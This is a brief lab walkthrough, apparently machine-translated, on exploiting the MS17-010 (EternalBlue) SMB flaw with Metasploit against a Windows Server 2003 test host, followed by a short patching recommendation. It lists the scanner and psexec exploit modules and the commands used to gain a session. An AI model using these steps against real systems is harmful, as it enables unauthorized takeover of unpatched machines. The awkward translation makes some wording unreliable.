MS17_ 010 utilization summary

One 、 What is? MS17_010

1. MS17_010 That's what we often call the blue hole of eternity , Erupted in 2017 year 4 month 14 Friday night , It's a use of Windows Systematic SMB Protocol vulnerabilities to gain the highest privileges of the system , In order to control the invaded computer . Even 2017 year 5 month 12 Japan , By reforming “ Eternal Blue ” Made wannacry Blackmail virus , The blackmail virus has been suffered all over the world , Even to schools 、 A large enterprise 、 Government and other institutions , The documents can only be recovered by paying a high ransom . But soon after the virus came out, it was patched by Microsoft .
2. The flaw is in Windows SMB v1 Kernel state functions in srv!SrvOs2FeaListToNt Processing FEA(File Extended Attributes) On conversion , In the big non paging pool ( Kernel data structure ,Large Non-Paged Kernel Pool) Buffer overflow on . function srv!SrvOs2FeaListToNt Will be FEA list convert to NTFEA(Windows NT FEA) list Will call srv!SrvOs2FeaListSizeToNt To calculate the transformed FEA lsit Size .

Two 、 Environmental preparation

1. Linux Kali
   IP：192.168.3.188
   Tools ：Metasploit
2. Windows server 2003
   IP：192.168.3.187
   port ：445 to open up

3、 ... and 、 Use process

1. Kali open MSF, Enter the command msfconsole

2. search ms17_010, Find available exploit, Here's the picture ：
   

3. First, use the fourth command to detect whether there is a vulnerability :
   use auxiliary/scanner/smb/smb_ms17_010
   After confirming that there is a vulnerability , Use attack exploit.

4. Utilized exploit yes ：
   exploit/windows/smb/ms17_010_psexec.

5. Through the command show options View the parameters to be set and find that only the target is needed IP.
   command ：set rhosts 192.168.3.187

6. Then is exploit, As shown in the figure below , Successfully established sessions.
   

7. At this time, the vulnerability has been successfully exploited , then Windows server 2003 Control right , As shown in the figure below ：
   

Four 、 Repair suggestions
As long as this vulnerability is covered with Microsoft's official patch or not used SMB In the case of service , close 445 port .